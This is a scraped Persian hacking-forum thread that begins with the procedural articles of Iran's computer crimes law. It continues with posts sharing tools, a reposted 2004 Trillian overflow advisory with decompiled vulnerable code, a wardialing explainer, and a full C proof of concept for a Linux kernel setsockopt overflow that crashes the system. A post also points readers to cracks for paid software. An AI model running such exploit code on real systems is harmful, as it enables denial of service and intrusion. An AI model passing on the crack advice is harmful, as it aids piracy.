ماده 27- چنانچه هر يک از مستخدمين و مأمورين دولتی اعم از قضايی و اداری يا شوراها يا شهرداري‌ها يا نهادهای انقلابی و به طور کلی قوای سه گانه و همچنين نيروهای مسلح يا شرکت‌های دولتی يا سازمان‌های دولتی وابسته به دولت و یا مأمورين به خدمات عمومی خواه رسمی يا غير رسمی به مناسبت انجام وظيفه مرتکب يکی از جرايم موضوع اين قانون شود و يا جرم بر اثر تبانی بيش از دو نفر واقع شود، مرتکب به بيش از دو سوم حداکثر مجازات مقرر محکوم خواهد شد.
تبصره- چنانچه عمل مرتكب معاونت باشد به نصف حداكثر مجازات مقرر قانوني محكوم خواهد شد.
بخش سوم: آيين دادرسي
ماده 28- در هر حوزه قضايی، در صورت ضرورت، به تشخيص رئيس قوه قضاييه به تعداد مورد نياز، شعبي از دادسراها و دادگاه‌هاي عمومي و انقلاب و تجدیدنظر براي رسيدگي به جرايم رايانه‎اي اختصاص مي‎يابد.
تبصره- قضات دادسراها و دادگاه‌هاي مذکور از بين قضاتي که آشنايي لازم به امور رايانه دارند، انتخاب خواهند شد.
ماده 29- در صورت حدوث اختلاف در صلاحيت، حل اختلاف مطابق مقررات قانون آيين دادرسي دادگاههاي عمومي و انقلاب در امور مدنی خواهد بود. ماده 30- كليه ايجادكنندگان نقاط تماس بين‌المللي و ارائه‌كنندگان خدمات اطلاع رساني و اينترنتي موظفند داده‌هاي حاصل از تبادل داده محتوا را حداقل تا سه ماه پس از ايجاد و اطلاعات مشترك را حداقل تا سه ماه پس از خاتمه اشتراك نگهداري نمايند.
تبصره: مراجع مذكور موظفند آدرس‌هاي IP خود را به اداره كل مبارزه با جرايم رايانه‌اي نيروي انتظامي اعلام نمايند.
ماده 31- هر گاه حفظ داده‌هاي ذخيره شده براي تحقيق يا دادرسي لازم باشد مقام قضايي مي‌تواند دستور حفاظت از داده‌هاي ذخيره شده را به اشخاصي كه داده‌هاي مذكور به نحوي تحت تصرف يا كنترل آنها قرار دارد، صادر نمايد و در موارد فوري ضابطين دادگستري مي‌‌توانند دستور حفاظت را صادر و مراتب را حداكثر تا 24 ساعت به اطلاع مقام قضايي برسانند. چنانچه هريك از مقامات دولتي از اجراي دستور مذكور خودداري نمايند علاوه بر مجازات مقرر در خصوص ساير افراد به انفصال موقت از خدمات دولتي از يك سال تا پنج سال محكوم خواهند شد.
تبصره ـ مدت زمان حفاظت حداكثر سه ماه مي باشد و با نظر مقام قضايي قابل تمديد است.
ماده 32 ـ مقامات قضايي مي‌توانند دستور افشاي داده‌هاي حفاظت شده مذكور در مواد30 و 31 را به اشخاصي كه داده‌هاي مذكور را در تصرف و يا كنترل دارند صادر تا در اختيار ضابطين قرار گيرد.
ماده 33- تفتيش و توقيف داده‌ها و يا سيستم‎هاي رايانه‌اي یا مخابراتی در مواردي بعمل مي‌آيد كه حسب دلايل ظن قوي به كشف جرم يا شناسايي متهم يا ادله جرم در آنها وجود داشته باشد.
ماده 34- تفتيش و توقيف داده‌ها و يا سيستم‌هاي رايانه‌اي یا مخابراتی با دستور مقام قضايي صورت مي‌گيرد و در جرائم مشهود ضابطين دادگستري مي‌توانند بدون دستور قضايي اقدام و ظرف 24 ساعت مراتب را به مقام قضايي اعلام نمايند.
ماده 35- دستور قضايي جهت تفتيش و توقيف حتی‌‌الامکان بايد شامل اطلاعاتي نظير مكان و محدوده تفتيش و توقيف، نوع داده‌هاي مورد نظر، مشخصات احتمالي فايل‌ها و سخت افزارها و نرم‌افزارها، تعداد آنها ، مدت زمان مورد نياز ، نحوه دستيابي به فايل‌هاي رمزگذاري شده، اجراي دستور در داخل يا خارج از محل باشد. تفتيش مشتمل بر موارد زير خواهد بود:
- تفتيش از تمام يا بخشي از سيستم‌ رايانه‌اي یا مخابراتی - تفتيش داده‌هاي رايانه‌اي ذخيره شده
- تفتيش حامل‌هاي داده‌ از قبيل: ديسكت و سي‌دي
- دستيابي به فايل‌هاي حذف شده يا رمزنگاري شده
ماده 36- داده‌ها، حامل‌های داده و سيستم‌های رايانه‌ای يا مخابراتی که دليل يا وسيله ارتکاب جرم بوده و يا از جرم تحصيل شده قابل توقيف می‌باشند. ماده 37- در جمع‌آوری داده‌ها با رعايت تناسب و توجه به نوع و اهميت و نقش داده‌ها در ارتکاب جرم به روش‌هايی از قبيل موارد ذيل عمل می شود:
الف - غير قابل دسترس نمودن داده‌ها با روشهايی چون تغيير گذر واژه و رمزنگاری
ب - تهيه پرينت از فايلهای متنی
ج - تهيه کپی يا تصوير از تمام يا بخشی از داده ها
د - ضبط حاملهای داده
ماده 38- توقيف سيستم‌های رايانه‌ای و يا مخابراتی متناسب با نوع و اهميت و نقش آنها در ارتکاب جرم با روش‌هايی از قبيل موارد ذيل صورت می‌گيرد:
الف- تغيير گذر واژه به منظور عدم دسترسی به سيستم
ب - خاموش نمودن سيستم
ج - پلمپ سيستم در محل استقرار
د – ضبط سيستم
ماده 39- در موارد ذيل سيستم‌های رايانه‌ای یا مخابراتی توقيف خواهند شد: الف- داده‌های ذخيره شده به سهولت قابل دسترس نبوده و يا حجم زيادی داشته باشند.
ب – بهره‌برداری و تجزيه و تحليل داده‌ها بدون وجود سيستم سخت افزاری امکان‌پذير نباشد.
ج - مالک يا مسئول يا متصرف قانونی سيستم به توقيف رضايت داده باشد. د - تهيه کپی از داده‌ها به لحاظ فنی امکان‌پذير نباشد.
هـ - تفتيش در محل سبب ايراد صدمه به داده‌ها گردد.
و - ساير موارد با تصمیم مقام قضايی.
ماده 40- توقيف حامل‌های داده غير متصل به سيستم رايانه‌ای یا مخابراتی مانند ضبط آلات و ادوات جرم انجام خواهد گرفت.
ماده 41ـ چنانچه در حين اجراي دستور تفتيش و توقيف، تفتيش داده‌هاي مرتبط با جرم ارتکابی در ساير سيستم‌هاي رايانه‌اي یا مخابراتی كه تحت كنترل و يا تصرف متهم قرار دارند ضروري باشد، ضابطين مي‌توانند دامنه تفتيش و توقيف را به سيستم‌های ديگر گسترش داده و داده‌هاي مورد نظر را تفتيش و يا توقيف نمايند.
ماده 42- در موارد توقيف داده‌ها، چنانچه به روند تحقيقات لطمه‌اي وارد نيايد با تقاضا و هزينه مالك يا دارنده حق دسترسی به داده‌ها و دستور مقام قضايی، کپی داده‌های توقيف شده به ايشان تحويل می‌شود، مگر آنکه داده‌ها غير قانونی باشد.
ماده 43ـ در مواردي كه با تشخيص مقام قضايي توقيف سيستم يا داده‌ها سبب ايراد لطمات جاني به افراد يا اخلال در برنامه‌هاي خدمات عمومي گشته و يا مخل امنيت كشور باشد از روش‌هاي مناسبتري به جاي توقيف استفاده خواهد شد.
ماده 44ـ متضرر می‌تواند در خصوص عمليات و اقدامات مأمورين درتوقيف داده‌ها و سيستم‌های رايانه‌ای و مخابراتی، اعتراض کتبی خود را همراه با دلايل ظرف 10 روز به مرجع قضايی دستور دهنده تسليم نمايد، به درخواست مذکور خارج از نوبت رسيدگی شده و تصميم متخذه قابل اعتراض است. ماده 45ـ شنود داده محتوا ممنوع است، جز در مواردی که به امنيت کشور مربوط است و يا برای احقاق حقوق اشخاص به نظر قاضی ضروری تشخيص داده شود. مدت زمان شنود بايد توسط مقام قضايی تعیین شود.
ماده 46- داده‌های رايانه‌ای و مخابراتی در صورتی که مطابق اين قانون جمع‌آوری و نگهداری شده باشند می‌توانند در اثبات جرم مورد استناد قرار گيرند.
ماده 47- به منظور جلوگيري از بروز هرگونه تغيير، تحريف يا آسيب و حفظ وضعيت اصلي داده‌های رايانه‌ای یا مخابراتی جمع‌آوری شده، لازم است تا زماني كه مرجع قضايي مربوطه ضروري مي‎داند، از آن نگهداري و مراقبت به عمل آيد.
تبصره- آئين نامه نحوه جمع آوری، نگهداری و مراقبت از داده‌های رايانه‌ای و مخابراتی توسط وزارت دادگستری با همکاری نيروی انتظامی و وزارت ارتباطات و فناوری اطلاعات ظرف سه ماه از تاريخ تصويب اين قانون تهيه و به تصويب رئيس قوه قضائيه خواهد رسيد.
بخش چهارم: معاضدت بين‌‎المللي
ماده 48- معاضدت بين‌المللي، هرگونه تبادل اطلاعات و انجام امور اداري و پليسي و قضايي كه دولت ايران و ساير دول را قادر به كشف، پيگيري، تعقيب،رسيدگي و اجراي حكم نمايد، در بر خواهد گرفت.
تبصره- چگونگی پیگیری و انجام امور مذکور در ماده 48 و تشکیلات سازمانی مورد نياز برای اجرای آن به موجب آئين نامه‌ای خواهد بود که ظرف سه ماه از تاریخ تصویب این قانون توسط وزارت دادگستری با کسب نظر از مراجع ذی ربط تهیه و به تصویب رئیس قوه قضاییه خواهد رسید.
ماده 49- قبول همكاري بين‌المللي در موارد ذيل ممنوع مي‌باشد:
الف ـ انجام درخواست با شرع و قوانين داخلي مغايرت داشته باشد. ب ـ انجام درخواست مستلزم اقدام عليه حاكميت، امنيت و يا ديگر منافع اساسي كشور ايران يا كشورهاي ديگر باشد.
بخش پنجم: سایر موارد
ماده 50- مرتکبین جرایم غیر مندرج در این قانون که از طریق سیستم‌های رایانه‌ای و یا مخابراتی ارتکاب می‌یابند، طبق قانون مربوطه مجازات خواهند شد، لیکن از نظر مقررات شکلی از قبیل مرجع رسیدگی و نحوه تفتیش و توقیف تابع ضوابط مقرر در این قانون می‌باشند.
ماده 51- کلیه قوانین و مقررات مغایر از تاریخ لازم‌الاجرا شدن این قانون ملغی می‌باشند.

33:

کسانی که ميخوان ip آدرس سايتی رو پيدا کنن من يه نرم افزار خوب و ساده سراغ دارم هر کس که ميخواد يه pm بزنه من اسمشو بهش بدم

34:

اگه از nmap خفن تره دمت گرم بگو تا حال کنیم :arrow:

35:

اين نرم افزاری که من ميگم بيشتر هکر ها از اين استفاده ميکنن برايه هک کردنه سايت ها بخاطره همين من اينجا نام نميبرم اگر کسی ميخواد به من PM بزنه تا من بهش معرفی کنم.

36:

دوست عزيز همين جا بگو تا همه ازش استفاده كنن.

37:

باشه من همين جا ميزانم چون چند نفر هم به من PM زدن گفتن اگه ميشه همون جا بگو. اينم اسمش:pingplotter اينم لينکش: [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ] درضمن يه کرکه خوب بايد براش پيدا کنين من هنوز خودم کرکه خوبی پيدا نکردم.

38:

تو freeserials یه سرچ بزنین حتما کرکش هم پیدا میشه

Gagsta جان - این خوبه ولی به nmap نمیشه

39:

اين nmap دقيف کارش چی هست؟

40:

سلام.
nmap كه ديگه خيلي معروفه فكر نمي كنم رو سرش برنامه اين بياد.

41:

mamad_tnt عزیز
شما درست گفتید
خوب چه خبر از اکسپلویت ها :?:

تا مدتی دیگه یه اموزش هک درست حسابی بدون کم وکسر
به زبان فارسی رو تموم می کنم (حداقل 2 ماه دیگه)
پیش نویسش کردم حدود 16XX صفحه در می آید اگه تونستم تمومش کنم برات یه نسخه می فرستم

یه سری هم به خبر ها بزن یه خبر از هک داریم ...........
حتما خوشت می آد

42:

دوست عزيز منم ميخام يعني برا منم بفرست
با تشكر

43:

چشم شما هم اگه تمومش کردم . . .

44:

بابا مرسي كارت درسته.
از اكسپلويت ها هم نوشتي؟
خدا كنه به زبان ساده و توضيح جزييات باشه.

45:

Only For mamad_TnT


Advisory 02/2004: Trillian remote overflows

e-matters GmbH
[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]

-= Security Advisory =-



Advisory: Trillian remote overflows
Release Date: 2004/02/24
Last Modified: 2004/02/24
Author: Stefan Esser [s.esser@e-matters.de]

Application: Trillian 0.71-0.74 w/ patch f
Trillian Pro 1.0, 2.0, 2.01
Severity: 2 vulnerabilities were found in the instant
messenger Trillian that allow remote compromise
Risk: Critical
Vendor Status: Vendor has fixed and released patches
Reference: [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]


Overview:

Quote from [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]

"What is Trillian?

Trillian is a skinnable, interoperable instant messaging client.
Grab the best IM client available on the Internet today!
Trillian .74 is completely free, with no spyware and no ads.
Over 10 million downloads can't be wrong!"

While playing around with the recently found Gaim vulnerabilities
it was discovered that two of them also affect Trillian and allow
remote compromise.


Details:

While testing the developed exploits against other instant
messaging clients it was discovered that Trillian as one of the
most popular 3rd party instant client for the windows operating
system is indeed vulnerable to the bugs discovered in the GAIM
sourcecode

The bugs in question are

[01 - AIM/Oscar DirectIM Integer Overflow]

When Trillian receives a DirectIM packet with a size above 8kb
it spawns a thread to receive the complete packet. This thread
allocates a buffer for the incoming packet and one extra byte.
This procedure suffers from an integer overflow when the size
is UINT_MAX and will only allocate a buffer of minimum size
in that case. This buffer is then filled with multiple calls to
recv() which will result in an arbitrary size heap overflow.

[02 - Yahoo Packet Parser Overflow]

A Yahoo Messenger packet consist of a header and a list of keys
with their associated values. When reading an oversized keyname
a standard stackoverflow can be triggered.

The code below is part of Trillian since version 0.71 which was
released on the 18th december 2001. It was manually decompiled.
The variable names were taken from the GAIM source code. If you
compare the decompiled code with the code in yahoo.c (revision
1.12 from 15th nov 2001) you will realise that it is more or
less identical. It is up to the reader to find an explanation
how this GPL licensed codesnippet ended up in Trillian.


int pos = 0;

while (pos + 1 < len) {

char key[64], *value = NULL;
int x = 0, accept;

struct yahoo *YAHOO = malloc(12);

while (pos + 1 < len) {
if (data[pos] == 0xc0 && data[pos + 1] == 0x80)
break;
key[x++] = data[pos++];
}
key[x] = 0;
pos += 2;
YAHOO->key = atoi(key);
accept = x;

if (accept) {
value = malloc(len - pos + 1);
}

while (pos + 1 < len) {
if (data[pos] == 0xc0 && data[pos + 1] == 0x80)
break;
if (accept) {
value[x++] = data[pos++];
}
}

if (accept) {
value[x] = 0;
}
pos += 2;
if (accept) {
YAHOO->value = strdup(value);
free(value);
}

return YAHOO;

}

Finally it has to be mentioned, that it is no longer possible
to exploit the second vulnerability through the Yahoo! servers.
It is not known what and why Yahoo! has changed, but they
do not longer transport unknown keys. We were only able to
exploit the vulnerability with man in the middle attacks.
This can be considered good news because this will make it
impossible to write a widespread worm.

Although Trillian Pro is compiled with the Visual Studio
stackoverflow protection it is possible to exploit this
vulnerability by simply overflowing up to the stack top and
abusing the power of structured exception handlers.


Proof of Concept:

e-matters is not going to release an exploit for any of these
vulnerabilities to the public.


Disclosure Timeline:

18. February 2004 - Cerulean Studios were contacted over their
forum and a mail was sent to the domain
owner because mails to [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]
simply bounce back and there is no other way
to contact them
19. February 2004 - Cerulean Studios acknowledged the mail
20. February 2004 - Cerulean Studios gave us the patches to test
Patches were verified and we were notified
that they plan to release them on Monday
23. February 2004 - Nothing happened...
24. February 2004 - Cerulean Studios have released the patched
versions


Recommendation:

As usual it is recommend to download the update from the Trillian
homepage at

[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]

We are not aware of any public exploit for these vulnerabilities,
but anyone who has developed an exploit for the GAIM vulnerabilities
could change it easily to work against Trillian, too.


GPG-Key:

[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]

pub 1024D/75E7AAD6 2002-02-26 e-matters GmbH - Securityteam
Key fingerprint = 43DD 843C FAB9 832A E5AB CAEB 81F2 8110 75E7 AAD6


Copyright 2004 Stefan Esser. All rights reserved.
if you want to be a hacke You mooooost understand English language......



:mrgreen: :mrgreen: :mrgreen: :mrgreen: :mrgreen: :mrgreen:

46:


47:


48:


49:


50:


51:


52:


53:


54:

اقا تازه من شروع كردم به خوندن اين تاپيك اما خيلي باحال هست ادامه بدين

55:

سایت MSN کره جنوبی هک شد

نويسنده : فرهاد جعفري تاريخ انتشار : 15/03/1384

روز پنجشنبه گذشته بعد از اینکه هکرها به سایت MSN کره جنوبی نفوذ کردند سرور این سایت به مدت 10 ساعت خاموش شد

هکرهایی که به سایت MSN کره جنوبی نفوذ کرده بودند سعی در سرقت نام های کاربری و اسم های رمز را داشته اند که شرکت مایکروسافت از نفوذ این هکرها با خبر می شود و سرور هاستینگ سایت MSN کره جنوبی را خاموش می کند. مایکروسافت می گوید: سرویس دهنده را خاموش کردیم تا از پاک بودن سیستم عامل از کدهای مخرب آسوده خاطر شویم.

سخنگوی شرکت مایکروسافت در مورد هک شدن سایت MSN کره جنوبی می گوید که این سایت به سبب استفاده از آسیب پذیری Iframe مرورگر Internet Explorer هک شده است، در صورتی که اصلاحیه این آسیب پذیری در ماه دسامبر سال پیش منتشر شده است.

سایت MSN کره جنوبی یکی از پرطرفدار ترین سایت های کشور کره می باشد که صفحه اول آن کاملا شبیه سایت رسمی MSN می باشد ولی این سایت مستقیما بدست شرکت مایکروسافت اداره نمی شود و از زیر مجموعه های این شرکت می باشد.

زمان دقیق هک شدن این سایت روز سه شنبه می باشد که بعد از گذشت دو روز متخصصین امنیت از وجود کدهای مخرب روی سرویس دهنده آگاه شدند و سرور را خاموش کردند.

مایکروسافت می گوید که ما با هکرهای این سایت بطور قانونی برخورد خواهیم کرد.

56:

wow
مرسي ان بي اس فاكر.
بازم تركونديا.
منم با اجازه شما يه چيزي ميذارم.
[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]

57:

ای ول - خیلی خوبه :arrow:

58:

for mamad_TNT



Vulnerable SystemsVulnerable Systems:
* Linux kernel versions 2.4.22 up to 2.4.25, 2.6.1 up to 2.6.3

Immune Systems:
* Linux kernel versions 2.4.26, 2.6.4

Exploit:
/* setsockopt proof of concept code by Julien TINNES (julien a.t cr0.org)
vulnerability found (as always by Paul Starzetz

This is only a lame POC which will crash the machine, no root shell here.
Maybe later, when everybody will have an updated box.

It should work on 2.6.1, 2.6.2 and 2.6.3 kernels.

Greets to Christophe Devine, too bad you wasn't with me for this one.

*/


#include <errno.h>
void perror (const char *s);

#include <sys/types.h>
#include <sys/socket.h>
#include <linux/in.h>
#include <linux/socket.h>

#define SOL_IP 0
#define MCAST_MSFILTER 48

/* mynumsrc and alloc_room control the overflow
* what we write can be controlled too (not needed
* here but needed for rootshell exploit
*/

#define mynumsrc 0x100 /* 0x100 should be enough, can be tweaked */
#define alloc_room 1 /* let it alocate only one u32 */

struct mygroup_filter
{
__u32 gf_interface; /* interface index */
struct sockaddr_storage gf_group; /* multicast address */
__u32 gf_fmode; /* filter mode */
__u32 gf_numsrc; /* number of sources */
struct sockaddr_storage gf_slist[mynumsrc]; /* interface index */
};


void
main (void)
{

int mysocket;
int sockprot;
struct mygroup_filter mygroup;
int optlen;
int i;
struct sockaddr_in *psin;

mygroup.gf_interface = 0;
mygroup.gf_numsrc = (1 << 30) - 4 + alloc_room;

mygroup.gf_group.ss_family = AF_INET;



for (i = 0; i < mynumsrc; i++)
{
psin = (struct sockaddr_in *) &mygroup.gf_slist[i];
psin->sin_family = AF_INET;
}


mysocket = socket (PF_INET, SOCK_STREAM, 0);

if (mysocket == -1)
{
perror ("Socket creation error: ");
exit (1);
}

optlen = sizeof (struct mygroup_filter);

printf ("Calling setsockopt(), this should crash the box...\n");
sockprot = setsockopt (mysocket, SOL_IP, MCAST_MSFILTER, &mygroup, optlen);

if (sockprot == -1)
{
perror ("Invalid setsockopt: ");
exit (1);
}
}



is This a Dream ??????

59:

سلام.
من كه چيز زيادي از اينا نميفهمم.؟؟؟؟؟؟؟؟
لطفا يكم بيشتر توضيح بديد.

60:

اگه هك كردن سايت كاري نداشت كه الان همه سايت ها هك ميشدن.
عزیز جان مگه شل نمی خواستی ؟
یه کم خوب اولشو بخون . . .

61:


62:

اینم یه نمونه برای برنامه های Brute Force programmmmming :


[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]

63:


64:


65:


66:


67:

ان بي اس فاكر قربونت برم كه كارت خيلي درسته.ادامه بده.
اگه اينجوري پيش بره به همين زودي مخ هك ميشم.حيف كه وقتم كمه.
يه درخواست ازت داشتم.
من به مقوله اكسپلويت ها هم خيلي علاقه دارم ولي زياد چيزي سر در نميارم.
اگه ميشه يه سري آموزش اكسپلويت از خيلي ساده (براي شروع كار) تا پيشرفته (اگه داري) بي زحمت بزار.
مرسي.

68:

ممد جان تو پست های قبلی لینک گذاشتم بهترین کتاب درحال حاضر اینه که خیلی خوب توضیح داده :
[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]

بازم در این مورد لینک میذارم . . .

69:

توي سايت ساتانيك هل يه آموزش خوب ديدم در رابطه با كوكي اينجا ليكشو ميذارم همه استفاده كنن بجز ان بي اس فاكر (تو خودت اوستايي فكر كنم اينها هم داشته باشي)


[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]

[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]

[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]

70:

بی خیال ما هیچی نیستیم . . . .
ما خاک پای اونایی هستیم که چیزی یادمون بدن . . ..

مطلابت هم خوبه . . . . :arrow:

71:

دوست عزيزم.
اين لينكي كه شما داديو رفتم يه سري نوشته هاي خرچنگ غورباغه ميبينم.
آيا بخاطر فونت در سيستم من هستش؟ يا اين سايت مشكل داره؟


72:

اگه دانلودش کردی - مشکل فونت داری . . . :arrow:

73:

من دانلود نكردم.
چيزي نبود كه دانلود كنم.وقتي روي لينكي كه گذاشتي كليك ميكنم اين صفحه اي كه عكسشو گذاشتم مياد.
ولي بازم فكر كنم مشكل از فونت باشه.
ايني كه بايد دانلود بشه پي دي اف هستش؟

74:

این فایل با ÷سوند chm هستش که باید اون رو با استفاده از نرم افزارهایی مانند Dap دانلود کنی و بعد استفاده کنی .
ولی فکر کنم اگه دانلود کنی بازم این مشکل رو داشته باشی :arrow:
که همون مشکل فونت هستش . . .

75:

با این یکی دیگه خیلی حال می کنین :
کد:
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

76:

اینم دومین شماره :
کد:
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

77:

اینم سومیش :
کد:
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

78:

ممد نظر یادت نره :arrow:

amir_p30:

عزيز من اين 4 تا پست رو ميتونستي در يك پست بنويسي.
لطفا رعايت كنيد.

ممنون

79:

اساسي ممنون.ولي ما كه هك رو گذاشتيم كنار چون فقط ازش ضرر ديديم.

80:

دمت گرم - هک که خود ضرره . . . :lol:
یه لطفی کنید و شما که پیشکسوت هستید مطلب بذارید تا ما ها که مبتدی هستیم از مطالبتان استفاده کنیم . . .

همانطور که خودتون فرمودید : امنیت باید احساس شود

دمت گرم
منتظر لینک و یا مطالب شما هستم . . .

81:

آقا مرسي كارتون عاليه
حيف كه حتي وقت دانلودشم ندارم.
به اميد ديدار

82:

سایت گروه امنیتی سیمرغ به زودی راه اندازی مجدد می شود . . . .

83:

ما که امیدواریم.

84:

ما هم همینطور

85:

چشم آق مدیر میبینی که ما فعلا ناشی هستیم تا راه بیفتیم خیلی راهه :lol: :lol: :lol:

86:

سايت سيمرغ برگشت

87:

9 صفحه هرچی پست داشت رو خوندم تا بفهمم War Dialing چیه! یه مقاله راجع بهش پیدا نشد! همش پیغام خصوصی و اینا ! نصفشونم که Broken Link بود!
جریان چی بوده؟ سال 2005 نمیذاشتن کسی آموزش هک بده؟ یا هنوز هم همینجوریه؟

88:

خوب shayah جان واقعا هم حق دارید 9 صفحه رو می خونی اخرش هم متوجه نمیشی این wardialer چیه!!!

خوب فکر نمیکنم از این ساده تر بشه این مبحث رو توضیح داد...


شاید تا به حال با برنامه pc anywhere کار کرده باشید با کمک این برنامه می توان از طریق خط تلفن به کامپیوتر خود وارد شده و هر کاری را انجام داد.
حال مجسم کنید که یک هکر شماره تلفن منزل شما را گرفته و وارد کامپیوتر شما شود بدون اینکه با کلمه عبور یا هر چیز دیگری مواجه گردد. سیستم wardialer از همین شیوه برای نفوذ استفاده می کند.در واقع بسیاری از شبکه های بزرگ دارای اشکالات اینچنینی هستند و می توان با داشتن مجموعه ای از شماره تلفن ها انها را امتحان کرده و مسیری برای نفوذ به شبکه یافت.شاید این روش به نظر شما در موارد بسیار کمی کارساز باشد ولی در واقع انقدر موثر است که تا به حال برنامه های بسیاری برای یافتن خطوط باز یا دارای کلمه عبور نوشته شده اند.

TBA و THC Scan از معروفترین این ابزارها می باشند.کافی است شما مجموعه ای از شماره تلفن ها را به انها بدهید تا کار خود را اغاز کنند.این برنامه ها تحت Dos اجرا شده و کار با انها نیاز به تجربه زیادی دارد.

البته برنامه های تحت ویندوز نیز وجود دارند به عنوان مثال phonetag و 1st dialer دو برنامه ساده از اینگونه هستند.این برنامه ها قابلیت های کمتری نسبت به گونه های تحت Dos خود دارند ولی در عین حال کار با انها ساده است.

1st dialer:
از این برنامه میتوانید به جای dialup ویندوز نیز استفاده کنید.




Phonetag:




این دو برنامه رو می تونید از لینک زیر دریافت کنید

حجم: 680 kb
[ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]

Pass: [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]

89:

سلام دوست عزیز این تاپیک مربوط به خیلی وقت پیشها هستش و اون موقع تمام لینکها کار می کردن ولی الان نه.
حالا چرا اینو الان دوباره اوردید توی این صفحه خدا میدونه.
ولی شما دقیقا کلمه Wardialing رو توی گوگل سرچ کن، نتایج جالبی میگیری.
همچنین میتونی بری به سایت websecurity.ir اونجا هم مقاله خوبی در این مورد هست.

در مورد وردیالینگ هم بگم که یکی از قدرتمند ترین روش از روشهای نفوذ به یک شبکه هستش که از طریق شماره گیری و پیدا کردن یک مودم منتظر روی خط می باشد و .... + مطالبی که این دوستمون در پست قبلی نوشتن

ضمنا این مقالاتی که قبلا گذاشتم دیگه قدیمی شده دنبال مقالات جدید برو......

شاد و پیروز باشید
ارادتمند DevilHell

90:


91:

سلام پس با این حساب دیگه یاد گرفتن هک یه چیز بیهوده ای میشه اصلا آدم جرات نمیکنه که بهش فکر کنه واقعا فایده هک چیه؟

92:

سلام میشه برای منم بفرستین؟ممنون میشم



 اين مطلب بدون دخالت انساني عينا از اين آدرس کپي شده و تمامي مسوليت آن با ناشر اصلي است.

برترین مطالب


کلاس درس Php - آموزش، بحث و تبادل نظر
درخواست راهنمایی ارتباط دریم با mysql
ساعت فلش رو چجوری روی صفحاتم قرار بدم و ...
اتصال به بانک sql در dreamweaver
آموزش کامل php از پایه (از زیر صفر ) به سوی (100)
آموزش PHP

4000 فلش حرفه ای برای طراحان صفحات وب !
آموزش مقدماتی Ajax (ای جکس)
چند سوال در مورد طراحي صفحات وب
آموزش طراحي صفحات وب (پيشرفته)
مركز دانلود اسکریپت های اجاکس ( همه چی با اجاکس )
آموزش دریم ویور(Dream Weaver)
*